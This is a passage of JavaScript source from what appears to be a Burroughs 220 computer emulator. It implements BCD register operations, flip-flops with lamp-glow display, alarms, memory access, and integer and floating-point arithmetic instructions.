B220Processor.bitTest(this.value, bitNr); // Update the lamp glow for the former state. if (this.visible) { this.glow[bitNr] = this.glow[bitNr]*(1.0-alpha) + bit*alpha; } // Set the new state. this.value = B220Processor.bitFlip(this.value, bitNr); } this.checkFC(); return this.value; }; /**************************************/ B220Processor.Register.prototype.add = function add(addend) { /* Adds "addend" to the current register value without regard to sign, discarding any overflow beyond the number of bits defined for the register. Returns the new register value. NOTE THAT THE ADDEND IS IN BCD, NOT BINARY. 
Also note that this uses the 220 adder, so generally do not use this for simple increment of address and counter registers -- use .inc() instead */ var digits = (this.bits+3) >> 2; return this.set(this.p.bcdAdd(this.value, addend, digits) % B220Processor.pow2[this.bits]); }; /**************************************/ B220Processor.Register.prototype.sub = function sub(subtrahend) { /* Subtracts "subtrahend" from the current register value without regard to sign, discarding any overflow beyond the number of bits defined for the register. Returns the new register value. NOTE THAT THE SUBTRAHEND IS IN BCD, NOT BINARY. Also note that this uses the 220 adder, so generally do not use this for simple decrement of address and counter registers -- use .dec() instead */ var digits = (this.bits+3) >> 2; return this.set(this.p.bcdAdd(subtrahend, this.value, digits, 1, 1) % B220Processor.pow2[this.bits]); }; /**************************************/ B220Processor.Register.prototype.inc = function inc() { /* Increments the register by 1 using BCD arithmetic and returns the new register value. This method does not use the 220 adder, so is safe to use for incrementing address and counter registers during instructions. Any overflow is discarded and the register wraps around to zero */ var d = this.value%0x10; // current low-order digit var maxPower = B220Processor.pow2[this.bits]; var power = 1; // factor for current digit position var w = this.value; // working copy of register value while (d == 9 && power < maxPower) {// while a carry would be generated this.value -= 9*power; // change this digit to a zero power *= 0x10; // bump power for next digit w = (w-d)/0x10; // shift working copy down d = w%0x10; // isolate the next digit } if (d < 9) { this.value += power; // increment the first digit that will not generate carry } return this.set(this.value % B220Processor.pow2[this.bits]); }; /**************************************/ B220Processor.Register.prototype.dec = function dec() { /* Decrements the register by 1 using BCD arithmetic and returns the new register value. This method does not use the 220 adder, so is safe to use for decrementing address and counter registers during instructions. Any underflow is discarded and the register wraps around to all-nines */ var d = this.value%0x10; // current low-order digit var maxPower = B220Processor.pow2[this.bits]; var power = 1; // factor for current digit position var w = this.value; // working copy of register value while (d == 0 && power < maxPower) {// while a borrow would be generated this.value += 9*power; // change this digit to a 9 power *= 0x10; // bump power for next digit w = (w-d)/0x10; // shift working copy down d = w%0x10; // isolate the next digit } if (d > 0) { this.value -= power; // decrement the first digit that will not generate a borrow } return this.set(this.value % maxPower); }; /*********************************************************************** * Generic Flip-Flop Class * ***********************************************************************/ B220Processor.FlipFlop = function FlipFlop(p, invisible) { /* Constructor for the generic FlipFlop class. "p" is a reference to the Processor object, used to access the timing members. "invisible" should be true if the FF does not have a visible presence in the UI -- this will inhibit computing the average lamp glow value for it. Note that it is important to increment this.execClock in the caller AFTER setting new values in registers and flip-flops.
This allows the average intensity to be computed based on the amount of time a bit was actually in that state */ this.visible = (invisible ? false : true); this.lastExecClock = 0; // time register was last set this.p = p; // processor instance this.value = 0; // binary value of register: read-only externally this.glow = 0; // average lamp glow value }; /**************************************/ B220Processor.FlipFlop.prototype.updateLampGlow = function updateLampGlow(beta) { /* Updates the average glow for the flip flop. Note that the glow is always aged by at least one clock tick. Beta is a bias in the range (0,1). For normal update, use 0; to freeze the current state, use 1. Returns the new average */ var alpha = Math.min(Math.max(this.p.execClock-this.lastExecClock, B220Processor.tick)/ B220Processor.maxGlowTime + beta, 1.0); if (this.visible) { this.glow = this.glow*(1.0-alpha) + this.value*alpha; } this.lastExecClock = this.p.execClock; return this.glow; }; /**************************************/ B220Processor.FlipFlop.prototype.set = function set(value) { /* Set the value of the FF. Use this rather than setting the value member directly so that average lamp glow can be computed. Returns the new value */ this.value = (value ? 1 : 0); if (this.visible) { this.updateLampGlow(0); } return value; }; /**************************************/ B220Processor.FlipFlop.prototype.flip = function flip() { /* Complement the value of the FF. Returns the new value */ return this.set(1-this.value); }; /*********************************************************************** * System Alarms * ***********************************************************************/ /**************************************/ B220Processor.prototype.setDigitCheck = function setDigitCheck(value) { /* Sets the Digit Check alarm */ if (!this.ALARMSW && !this.DIGITCHECKSW) { this.digitCheckAlarm.set(value); if (value) { this.setStop(); this.SST.set(1); // stop at end of current cycle } } }; /**************************************/ B220Processor.prototype.setProgramCheck = function setProgramCheck(value) { /* Sets the Program Check alarm */ if (!this.ALARMSW) { this.ALT.set(value); if (value) { this.setStop(); } } }; /**************************************/ B220Processor.prototype.setStorageCheck = function setStorageCheck(value) { /* Sets the Storage Check alarm */ if (!this.ALARMSW) { this.MET.set(value); if (value) { this.setStop(); this.SST.set(1); // stop at end of current cycle } } }; /**************************************/ B220Processor.prototype.setMagneticTapeCheck = function setMagneticTapeCheck(value) { /* Sets the Magnetic Tape Check alarm */ if (!this.ALARMSW) { this.TAT.set(value); if (value) { this.setStop(); } } }; /**************************************/ B220Processor.prototype.setCardatronCheck = function setCardatronCheck(value) { /* Sets the Cardatron Check alarm */ if (!this.ALARMSW) { this.CRT.set(value); if (value) { this.setStop(); } } }; /**************************************/ B220Processor.prototype.setPaperTapeCheck = function setPaperTapeCheck(value) { /* Sets the Paper Tape Check alarm */ if (!this.ALARMSW) { this.PAT.set(value); if (value) { this.setStop(); } } }; /**************************************/ B220Processor.prototype.setHighSpeedPrinterCheck = function setHighSpeedPrinterCheck(value) { /* Sets the High Speed Printer Check alarm */ if (!this.ALARMSW) { this.HAT.set(value); if (value) { this.setStop(); } } }; /*********************************************************************** * Memory 
Access * ***********************************************************************/ /**************************************/ B220Processor.prototype.readMemory = function readMemory() { /* Reads the contents of one word of memory into the IB register from the address in the E register. Sets the Storage Check alarm if the address is not valid. Returns the word fetched, or the current value of IB if invalid address */ var addr = B220Processor.bcdBinary(this.E.value); if (isNaN(addr)) { this.setStorageCheck(1); return this.IB.value; } else if (addr >= this.memorySize) { this.setStorageCheck(1); return this.IB.value; } else if (this.MEMORYLOCKOUTSW) { return this.IB.set(this.D.value); } else { return this.IB.set(this.MM[addr]); } }; /**************************************/ B220Processor.prototype.writeMemory = function writeMemory() { /* Stores one word of memory from the IB register to the address in the E register. Sets the Storage Check alarm if the address is not valid */ var addr = B220Processor.bcdBinary(this.E.value); if (isNaN(addr)) { this.setStorageCheck(1); } else if (addr >= this.memorySize) { this.setStorageCheck(1); } else if (this.MEMORYLOCKOUTSW) { this.D.set(this.IB.value); } else { this.MM[addr] = this.IB.value; } }; /*********************************************************************** * The 220 Adder and Arithmetic Operations * ***********************************************************************/ /**************************************/ B220Processor.prototype.bcdAdd = function bcdAdd(a, d, digits, complement, initialCarry) { /* Returns an unsigned, BCD addition of "a" and "d", producing "digits" of BCD result. Any higher-order digits and any overflow are discarded. Maximum capacity in Javascript (using IEEE 64-bit floating point) is 14 digits. On input, "complement" indicates whether 9s-complement addition should be performed; "initialCarry" indicates whether an initial carry of 1 should be applied to the adder. On output, this.CI is set from the final carry toggles of the addition and this.C10 will have the carry toggle. Further, this.Z will still have a copy of the sign (high-order) digit. 
Sets the Program Check alarm if non-decimal digits are encountered, but does not set the Overflow toggle */ var ad; // current augend (a) digit; var adder; // local copy of adder digit var am = a % B220Processor.pow2[digits*4]; // augend mantissa var carry = (initialCarry || 0) & 1;// local copy of carry toggle (CI1, CAT) var compl = complement || 0; // local copy of complement toggle var ct = carry; // local copy of carry register (CI1-16) var dd; // current addend (d) digit; var dm = d % B220Processor.pow2[digits*4]; // addend mantissa var shiftPower = B220Processor.pow2[(digits-1)*4]; // to position high-order digit var x; // digit counter // Loop through the digits for (x=0; x<digits; ++x) { // shift low-order augend digit right into the adder ad = am % 0x10; am = (am - ad)/0x10; this.X.set(ad); // tests for FC if (compl) { ad = 9-ad; } // Add the digits plus carry, complementing as necessary dd = dm % 0x10; this.Y.set(dd); // tests for FC adder = ad + dd + carry; // Decimal-correct the adder if (adder < 10) { carry = 0; } else { adder -= 10; carry = 1; } // Compute the carry toggle register (just for display) ct = (((ad & dd) | (ad & ct) | (dd & ct)) << 1) + carry; // Update the visible registers (for display only) this.Z.set(adder); // tests for FC this.C10.set(carry); this.CI.set(ct); this.SI.set(0x0F ^ ct); // just a guess as to the sum inverters // rotate the adder into the high-order digit am += adder*shiftPower; // shift the addend right to the next digit dm = (dm - dd)/0x10; } // for x return am; }; /**************************************/ B220Processor.prototype.clearAdd = function clearAdd(absolute) { /* After accessing memory, algebraically add the addend (IB) to zero. If "absolute" is true, then the sign-bit of the word from memory is forced to the subtract toggle. All values are BCD with the sign in the 11th digit position. Sets the Digit Check alarm as necessary */ var am = 0; // augend mantissa var dm; // addend mantissa var dSign; // addend sign this.opTime = 0.095; this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address this.A.set(am); // sign is zero return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000); if (absolute) { // force sign bit to SUT dSign = (dSign & 0x0E) | this.SUT.value; } else if (this.SUT.value) { // complement the sign bit dSign = dSign ^ 0x01; } am = this.bcdAdd(am, dm, 11); // Set toggles for display purposes and return the result this.DST.set(dSign%2); this.SGT.set(dSign%2); this.D.set(dSign*0x10000000000 + dm); this.A.set(dSign*0x10000000000 + am); }; /**************************************/ B220Processor.prototype.integerAdd = function integerAdd(absolute, toD) { /* After accessing memory, algebraically add the addend (IB) to the augend (A). If "absolute" is true, then the sign of the word from memory is forced to zero. If "toD" is false, the result will be left in A, and D will contain a copy of the word from memory with the three high-order bits of its sign set to zero. If "toD" is true, the result will be left in D, and A will not be altered, except than the three high-order bits of its sign digit will be set to zero. Note that if the value of the result is zero, its sign will be the original sign of A. All values are BCD with the sign in the 11th digit position. 
Sets the Overflow and Digit Check alarms as necessary */ var am = this.A.value % 0x10000000000; // augend mantissa var aSign = ((this.A.value - am)/0x10000000000)%2; var compl; // complement addition required var dm; // addend mantissa var dSign; // addend sign var sign; // local copy of sign toggle var timing = 0.095; this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address this.A.set(am); // sign is zero return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; sign = (absolute ? 0 : dSign); if (this.SUT.value) { sign = 1-sign; // complement sign for subtraction } compl = (aSign^sign); am = this.bcdAdd(am, dm, 11, compl, compl); // Now examine the resulting sign (still in the adder) to see if we have overflow // or need to recomplement the result switch (this.Z.value) { case 0: am += sign*0x10000000000; break; case 1: am += (sign-1)*0x10000000000; this.OFT.set(1); break; default: // sign is 9 // reverse the sign toggle and recomplement the result (virtually adding to the zeroed dm) sign = 1-sign; am = this.bcdAdd(am, 0, 11, 1, 1); // after recomplementing, set the correct sign (adder still contains sign of result) am += (sign - this.Z.value)*0x10000000000; timing += 0.060; break; } // switch this.Z.value if (am%0x10000000000 == 0) { am = aSign*0x10000000000; } // Set toggles for display purposes and return the result this.DST.set(dSign); this.SGT.set(sign); if (toD) { this.D.set(am); this.A.set(this.A.value%0x20000000000); } else { this.D.set(dSign*0x10000000000 + dm); this.A.set(am); } this.opTime = timing; }; /**************************************/ B220Processor.prototype.integerExtract = function integerExtract() { /* "Extract" digits from A according to the digit pattern in IB. If a pattern digit is even, then the corresponding digit in the value is set to zero. If the pattern digit is odd, then the corresponding value digit is not changed. Overflow is not possible, but a Digit Check alarm can occur */ var ad; // current value (A) digit; var am = this.A.value; // value mantissa var dd; // current pattern (D) digit; var dm; // pattern mantissa var x; // digit counter this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address return; // exit to Operation Complete } // Loop through the 11 digits including signs dm = this.IB.value; for (x=0; x<11; ++x) { // shift low-order value digit right into the adder ad = am % 0x10; am = (am - ad)/0x10; this.X.set(ad); // tests for FC // shift low-order pattern digit into the adder dd = dm % 0x10; dm = (dm - dd)/0x10; this.Y.set(dd); // tests for FC if (dd%2) { // if extract digit is odd this.Z.set(ad); // keep the value digit } else { // otherwise, if it's even ad = 0; // clear the value digit this.Z.set(0); } // rotate the digit into the result am += ad*0x10000000000; } // for x // Set toggles for display purposes and return the result this.A.set(am); this.D.set(this.IB.value); this.opTime = 0.145; }; /**************************************/ B220Processor.prototype.integerMultiply = function integerMultiply() { /* Algebraically multiply the multiplicand (IB) by the multiplier (A), producing a 20-digit product in A and R. Final sign of R will be final sign of A. All values are BCD with the sign in the 11th digit position. Sets Forbidden- Combination stop as necessary. 
Overflow is not possible */ var ad; // current product (A) digit; var am = this.A.value % 0x10000000000; // product (A) mantissa var aSign = ((this.A.value - am)/0x10000000000)%2; var count = 0; // count of multiply cycles var dm; // multiplicand mantissa var dSign; // sign of multiplicand var rc; // dup of rd for add counting var rd; // current multiplier (R) digit; var rm = am; // current multiplier (R) mantissa var sign; // local copy of sign toggle (sign of product) var x; // digit counter this.SUT.set(0); this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address this.A.set(am); // sign is zero this.R.set(0); return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; sign = aSign ^ dSign; am = 0; // clear the local product (A) mantissa // We now have the multiplicand in D (dm), the multiplier in R (rm), and an // initial product of zero in A (am). Go through a classic multiply cycle, // doing repeated addition based on each multiplier digit, and between digits // shifting the product (in am and rm) one place to the right. After 10 digits, // we're done. The 220 probably did a combination of addition and subtraction, // depending on whether the current multiplier digit was >5, to minimize the // number of addition cycles. We don't care how long this takes internally, // so the following mechanization uses the simple way. for (x=0; x<10; ++x) { rd = rm % 0x10; count += B220Processor.multiplyDigitCounts[rd]; for (rc=rd; rc>0; --rc) { // repeated addition am = this.bcdAdd(am, dm, 11, 0, 0); } ad = am % 0x10; am = (am-ad)/0x10; rm = (rm-rd)/0x10 + ad*0x1000000000; } // for x this.DST.set(dSign); this.SGT.set(sign); this.A.set(sign*0x10000000000 + am); this.R.set(sign*0x10000000000 + rm); this.D.set(dSign*0x10000000000 + dm); this.opTime = 0.090 + 0.005*count; }; /**************************************/ B220Processor.prototype.integerDivide = function integerDivide() { /* Algebraically divide the dividend (A & R) by the divisor (IB), producing a signed 10-digit quotient in A and the remainder in R. All values are BCD with the sign in the 11th digit position. Sets Digit Check alarm as necessary. If the magnitude of the divisor (IB) is less than or equal to the magnitude of the dividend (A), Overflow is set and division terminates */ var am = this.A.value % 0x10000000000; // current remainder (A) mantissa var aSign = ((this.A.value - am)/0x10000000000)%2; var count = 0; // count of divide cycles var dm; // divisor mantissa var dSign; // sign of divisor var rd; // current quotient (R) digit; var rm = this.R.value%0x10000000000;// current quotient (R) mantissa (ignore sign) var rSign = (this.R.value - rm)/0x10000000000; // R register sign (restored later) var sign; // local copy of sign toggle (sign of quotient) var tSign = 1; // sign for timing count accumulation var x; // digit counter this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address this.A.set(am); // sign is zero this.R.set(aSign*0x10000000000 + rm); return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; sign = aSign ^ dSign; this.DST.set(dSign); this.SGT.set(sign); this.SUT.set(1); // We now have the divisor in D (dm) and the dividend in A (am) & R (rm). // The value in am will become the remainder; the value in rm will become // the quotient.
Go through a classic long-division cycle, repeatedly // subtracting the divisor from the dividend, counting subtractions until // underflow occurs, and shifting the divisor left one digit. // The 220 probably did not work quite the way that it has been mechanized // below, which is close to the way the 205 worked. The funny way that timing // for division could be calculated from the differences of alternate quotient // digits (see the Operational Characteristics manual, 5020A, August 1960, p.212) // suggests that something clever was going on with the 220 divide implementation. if (this.bcdAdd(dm, am, 11, 1, 1) < 0x10000000000) { this.OFT.set(1); this.A.set(aSign*0x10000000000 + am); this.R.set(rSign*0x10000000000 + rm); this.D.set(this.IB.value); this.opTime = 0.090; } else { for (x=0; x<10; ++x) { // First, shift A & R to the left one digit, with A1 shifting to ASGN rd = (rm - rm%0x1000000000)/0x1000000000; rm = (rm%0x1000000000)*0x10; am = am*0x10 + rd; // Now repeatedly subtract D from A until we would get underflow. rd = 0; while (am >= dm) { am = this.bcdAdd(dm, am, 11, 1, 1); ++rd; count += tSign; } rm += rd; // move digit into quotient tSign = -tSign; } // for x this.A.set(sign*0x10000000000 + rm); // rotate final values in A & R this.R.set(aSign*0x10000000000 + am); this.D.set(dSign*0x10000000000 + dm); this.opTime = 3.805 + 0.060*count; } }; /**************************************/ B220Processor.prototype.floatingAdd = function floatingAdd(absolute) { /* Algebraically add the floating-point addend (IB) to the floating-point augend (A), placing the result in A and clearing D. The R register is not affected. All values are BCD with the sign in the 11th digit position. The floating exponent is in the first two digit positions, biased by 50. Sets Overflow and the Digit Check alarm as necessary. For more on the use of the limiter digit in C/11 and the mechanization of floating add/subtract on the 220, see United States Patent 3,022,006, 1962-02-20 */ var ax; // augend exponent (binary) var am = this.A.value % 0x10000000000; // augend mantissa (BCD) var aSign = ((this.A.value - am)/0x10000000000)%2; var compl; // complement addition required var d; // scratch digit; var dx; // addend exponent (binary) var dm; // addend mantissa (BCD) var dSign; // addend sign var limiter = 0; // normalizing limiter var shifts = 0; // number of scaling/normalization shifts done var sign; // local copy of sign toggle var timing = 0.125; // minimum instruction timing var zeroed = false; // true if either operand normalizes to zero this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; sign = (absolute ? 0 : dSign); if (this.SUT.value) { sign = 1-sign; // complement sign for subtraction } ax = (am - am%0x100000000)/0x100000000; am %= 0x100000000; dx = (dm - dm%0x100000000)/0x100000000; dm %= 0x100000000; // If the exponents are unequal, scale the smaller // until they are in alignment, or one mantissa becomes zero. // Scale D until its exponent matches or the mantissa goes to zero. while (ax > dx) { timing += 0.010; dx = this.bcdAdd(1, dx, 2, 0, 0); // ++dx d = dm % 0x10; dm = (dm - d)/0x10; // shift D right if (dm == 0) { zeroed = true; sign = aSign; // result is value in A break; } } // Scale A until its exponent matches or the mantissa goes to zero. 
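// Editor's note (illustrative only, values invented): if A held 50 12345678
// and D held 52 87654321 (exponents biased by 50), the loop below would shift
// A's mantissa right twice (12345678 -> 00123456) while stepping ax up from
// 50 to 52, so that both mantissas are aligned on the same power of ten
// before the BCD add.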
while (ax < dx) { timing += 0.010; ax = this.bcdAdd(1, ax, 3, 0, 0); // ++ax d = am % 0x10; am = (am - d)/0x10; // shift A right if (am == 0) { zeroed = true; am = dm; // result is value in D with adjusted sign ax = dx; dSign = 0; break; } } // Add the mantissas if (!zeroed) { compl = (aSign^sign); am = this.bcdAdd(am, dm, 11, compl, compl); // Now examine the resulting sign (still in the adder) to see if there // is a carry and we need to recomplement the result and sign. if (this.Z.value) { // Reverse the sign toggle and recomplement the result. sign = 1-sign; am = this.bcdAdd(am, 0, 11, 1, 1); timing += 0.060; } dm = dSign = 0; // Set D to its strange result value dx = 0x10; // Normalize or scale the result as necessary if (am >= 0x100000000) { // Mantissa overflow: add/subtract can produce at most one digit of // overflow, so scale by shifting right and incrementing the exponent, // checking for overflow in the exponent. if (ax < 0x99) { timing += 0.005; ax = this.bcdAdd(1, ax, 3, 0, 0); // ++ax d = am % 0x10; am = (am - d)/0x10; // shift A right } else { // A scaling shift would overflow the exponent, so set the overflow // toggle and leave the mantissa as it was from the add, without the // exponent inserted back into it. Since the A register gets reassembled // below, we need to set up the mantissa and exponent so the reconstruct // will effectively do nothing. this.OFT.set(1); sign = ax = dx = 0; } } else if (am == 0) { // mantissa is zero => result is zero ax = sign = 0; timing += 0.065; } else { // normalize the result as necessary while (am < 0x10000000) { if (ax > 0 && shifts < 8) { ++shifts; timing += 0.010; ax = this.bcdAdd(1, ax, 3, 1, 1); // --ax am *= 0x10; // shift left } else { // Exponent underflow: set the reconstructed A to zero. am = ax = sign = 0; break; } } // Determine whether normalizing shifts exceed the limiter value limiter = (this.CCONTROL - this.CCONTROL%0x1000)/0x1000; if (limiter > 0) { if (limiter >= 8) { limiter = 0; } else if (shifts > limiter) { limiter = 10 - (shifts-limiter); this.SST.set(1); // limiter exceeded: set Single-Step } else { limiter = 0; } } } } // Rebuild the C register with the final normalization limiter this.CCONTROL = this.CCONTROL%0x1000 + limiter*0x1000; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); // Set toggles for display purposes and set the result. this.AX.set(ax); this.DX.set(dx); this.DST.set(dSign); this.SGT.set(sign); this.A.set((sign*0x100 + ax)*0x100000000 + am); this.D.set((dSign*0x100 + dx)*0x100000000 + dm); this.opTime = timing; }; /**************************************/ B220Processor.prototype.floatingAdd__WITH_ROUND = function floatingAdd(absolute) { /* Algebraically add the floating-point addend (IB) to the floating-point augend (A), placing the result in A and clearing D. The R register is not affected. All values are BCD with the sign in the 11th digit position. The floating exponent is in the first two digit positions, biased by 50. Sets Overflow and the Digit Check alarm as necessary. 
For more on the use of the limiter digit in C/11 and the mechanization of floating add/subtract on the 220, see United States Patent 3,022,006, 1962-02-20 */ /* THIS IS AN EXPERIMENTAL VERSION THAT ROUNDS RESULTS */ var ax; // augend exponent (binary) var am = this.A.value % 0x10000000000; // augend mantissa (BCD) var aSign = ((this.A.value - am)/0x10000000000)%2; var compl; // complement addition required var d; // scratch digit; var dx; // addend exponent (binary) var dm; // addend mantissa (BCD) var dSign; // addend sign var limiter = (this.CCONTROL - this.CCONTROL%0x1000)/0x1000; // normalizing limiter var shifts = 0; // number of scaling/normalization shifts done var sign; // local copy of sign toggle var timing = 0.125; // minimum instruction timing this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; sign = (absolute ? 0 : dSign); if (this.SUT.value) { sign = 1-sign; // complement sign for subtraction } ax = (am - am%0x100000000)/0x100000000; am %= 0x100000000; dx = (dm - dm%0x100000000)/0x100000000; dm %= 0x100000000; am *= 0x100; // insert two low-order rounding digits dm *= 0x100; // If the exponents are unequal, scale the smaller // until they are in alignment, or one mantissa becomes zero. // Scale D until its exponent matches or the mantissa goes to zero. while (ax > dx) { if (++shifts < 8) { timing += 0.010; dx = this.bcdAdd(1, dx, 2, 0, 0); // ++dx d = dm % 0x10; dm = (dm - d)/0x10; // shift right } else { sign = aSign; // result is value in A limiter = 0; break; } } // Scale A until its exponent matches or the mantissa goes to zero. while (ax < dx) { if (++shifts < 8) { timing += 0.010; ax = this.bcdAdd(1, ax, 3, 0, 0); // ++ax d = am % 0x10; am = (am - d)/0x10; // shift right } else { am = dm; // result is value in D with adjusted sign ax = dx; limiter = 0; break; } } // Add the mantissas if (shifts < 8) { compl = (aSign^sign); am = this.bcdAdd(am, dm, 13, compl, compl); // Now examine the resulting sign (still in the adder) to see if there // is a carry and we need to recomplement the result and sign. if (this.Z.value) { // Reverse the sign toggle and recomplement the result. sign = 1-sign; am = this.bcdAdd(am, 0, 13, 1, 1); timing += 0.060; } } dm = dSign = 0; // Set D to its strange result value dx = 0x10; // Normalize or scale the result as necessary if (am >= 0x10000000000) { // Mantissa overflow: add/subtract can produce at most one digit of // overflow, so scale by shifting right and incrementing the exponent, // checking for overflow in the exponent. limiter = 0; if (ax < 0x99) { timing += 0.005; ax = this.bcdAdd(1, ax, 3, 0, 0); // ++ax d = am % 0x10; am = (am - d)/0x10; // shift right } else { // A scaling shift would overflow the exponent, so set the overflow // toggle and leave the mantissa as it was from the add, without the // exponent inserted back into it. Since the A register gets reassembled // below, we need to set up the mantissa and exponent so the reconstruct // will effectively do nothing. 
this.OFT.set(1); sign = ax = dx = limiter = 0; } } else if (am == 0) { // mantissa is zero ax = sign = limiter = 0; timing += 0.065; } else { // normalize the result as necessary shifts = 0; while (am < 0x1000000000) { // NOTE: THIS INCLUDES THE ROUNDING DIGITS if (ax > 0) { ++shifts; timing += 0.010; ax = this.bcdAdd(1, ax, 3, 1, 1); // --ax am *= 0x10; // shift left } else { // Exponent underflow: set the reconstructed A to zero. am = ax = sign = 0; break; } } // Determine whether normalizing shifts exceed the limiter value if (limiter > 0) { if (limiter >= 8) { limiter = 0; } else if (shifts > limiter) { limiter = 10 - (shifts-limiter); this.SST.set(1); // limiter exceeded: set Single-Step } else { limiter = 0; } } } // Rebuild the C register with the final normalization limiter this.CCONTROL = this.CCONTROL%0x1000 + limiter*0x1000; this.C.set((this.CCONTROL*0x100 + this.COP)*0x10000 + this.CADDR); // Set toggles for display purposes and set the result. d = am%0x100; // get the rounding digits am = (am - d)/0x100; // scale back to 8 digits if (d >= 0x50) { // round required am = this.bcdAdd(1, am, 11, 0, 0); if (am >= 0x100000000) { ax = this.bcdAdd(1, ax, 3, 0, 0); // ignore exponent overflow, for now d = am%0x10; am = (am - d)/0x10; if (d >= 5) { // round again after scale right am = this.bcdAdd(1, am, 11, 0, 0); } } } this.AX.set(ax); this.DX.set(dx); this.DST.set(dSign); this.SGT.set(sign); this.A.set((sign*0x100 + ax)*0x100000000 + am); this.D.set((dSign*0x100 + dx)*0x100000000 + dm); this.opTime = timing; }; /**************************************/ B220Processor.prototype.floatingMultiply = function floatingMultiply() { /* Algebraically multiply the floating-point multiplicand in the IB register by the floating-point multiplier in the A register, producing a 18-digit product (16 mantissa + 2 exponent) in A and R. All values are BCD with the sign in the 11th digit position. The floating exponent is in the first two digit positions, biased by 50. 
Sets the Digit Check alarm as necessary */ var ad; // current product (A) digit; var ax; // product/multiplier (A) exponent var am = this.A.value % 0x10000000000; // product (A) mantissa var aSign = ((this.A.value - am)/0x10000000000)%2; var count = 0; // count of word-times consumed var dx; // multiplicand exponent var dm; // multiplicand mantissa var dSign; // multiplicand sign var rc; // dup of rd for add counting var rd; // current multipler (R) digit; var rm = 0; // current multiplier (R) mantissa var sign; // local copy of sign toggle (sign of product) var timing = 0.085; // minimum instruction timing var x; // digit counter this.SUT.set(0); this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; ax = (am - am%0x100000000)/0x100000000; am %= 0x100000000; dx = (dm - dm%0x100000000)/0x100000000; dm %= 0x100000000; if (am < 0x10000000) { // A is not normalized, so assume zero this.A.set(0); this.R.set(0); } else if (dm < 0x10000000) { // D is not normalized, so assume zero this.A.set(0); this.R.set(0); } else { sign = (aSign ^ dSign); rm = am; // shift A:08 to R:98, then shift R again right 1 am = 0; // result of shifting A to R dm *= 0x100; // circulate D two places left (D:22 is 0, so a simple shift left will do) x = this.bcdAdd(ax, dx, 3); // do exponent arithmetic into temp x ax = this.bcdAdd(0x50, x, 3, 1, 1);// subtract the exponent bias from the A exponent timing += 0.080; if (x >= 0x150) { // exponent overflow this.OFT.set(1); this.A.set(am); this.R.set(rm); } else if (x < 0x50) { // exponent underflow this.A.set(0); this.R.set(0); dm %= 0x100000000; } else { // We now have the multiplicand in D (dm), the multiplier in R (rm), and an // initial product of zero in A (am). Go through a classic multiply cycle, // doing repeated addition based on each multipler digit, and between digits // shifting the product (in am and rm) one place to the right. After 8 digits, // we're done, except for normalization. for (x=0; x<8; ++x) { rd = rm % 0x10; count += B220Processor.multiplyDigitCounts[rd]; for (rc=rd; rc>0; --rc) { am = this.bcdAdd(am, dm, 11, 0, 0); } // while rd ad = am % 0x10; am = (am-ad)/0x10; rm = (rm-rd)/0x10 + ad*0x1000000000; } // for x // Normalize the result as necessary. if (am >= 0x1000000000) { // Shift product two places right timing += 0.020; ad = am % 0x100; am = (am-ad)/0x100; rd = rm % 0x100; rm = (rm-rd)/0x100 + ad*0x100000000; } else if (ax > 0) { // Shift product one place right timing += 0.010; ad = am % 0x10; am = (am-ad)/0x10; rd = rm % 0x10; rm = (rm-rd)/0x10 + ad*0x1000000000; ax = this.bcdAdd(0x01, ax, 3, 1, 1); // decrement exponent } else { // Exponent underflow: set R and the reconstructed A to zero. 
am = ax = rm = sign = 0; } // Reconstruct the final product in the registers this.A.set((sign*0x100 + ax)*0x100000000 + am); this.R.set(sign*0x10000000000 + rm); timing += 0.005*count; } // Set the registers and toggles for display this.SGT.set(sign); this.DST.set(dSign); this.AX.set(ax); this.DX.set(dx); this.D.set(dm); } this.opTime = timing; }; /**************************************/ B220Processor.prototype.floatingDivide = function floatingDivide() { /* Algebraically divide the 18-digit (16 mantissa + 2 exponent) floating- point dividend in the A & R registers by the floating-point divisor in the D register, producing a 9- or 10-digit quotient in the A & R registers and a 6- or 7-digit remainder in the low-order digits of the R register. All values are BCD with the sign in the 11th digit position. The floating exponent is in the first two digit positions, biased by 50. Sets the Digit Check alarm as necessary */ var ad = 0; // current remainder (A) digit var ax = 0; // dividend/quotient exponent var am = this.A.value % 0x10000000000; // current remainder (A) mantissa var aSign = ((this.A.value - am)/0x10000000000)%2; var count = 0; // count of word-times consumed var dx = 0; // divisor exponent var dm = 0; // divisor mantissa var dSign = 0; // divisor sign var rd = 0; // current quotient (R) digit; var rm = this.R.value%0x10000000000;// current quotient (R) mantissa (drop sign) var rSign = (this.R.value-rm)/0x10000000000; // R register sign (restore later) var sign = 0; // local copy of sign toggle (sign of quotient) var timing = 0.085; // minimum instruction timing var tSign = 1; // sign for timing count accumulation var x = 0; // digit counter this.E.set(this.CADDR); this.readMemory(); if (this.MET.value) { // invalid address return; // exit to Operation Complete } dm = this.IB.value % 0x10000000000; dSign = ((this.IB.value - dm)/0x10000000000)%2; sign = aSign ^ dSign; this.SUT.set(1); ax = (am - am%0x100000000)/0x100000000; am %= 0x100000000; dx = (dm - dm%0x100000000)/0x100000000; dm %= 0x100000000; if (am < 0x10000000 && dm >= 0x10000000) { this.A.set(0); // A is not normalized but D is, quotient=0 this.R.set(0); } else if (dm < 0x10000000) { this.OFT.set(1); // D is not normalized, overflow (div 0) this.A.set(ax*0x100000000 + am); } else { // Add the 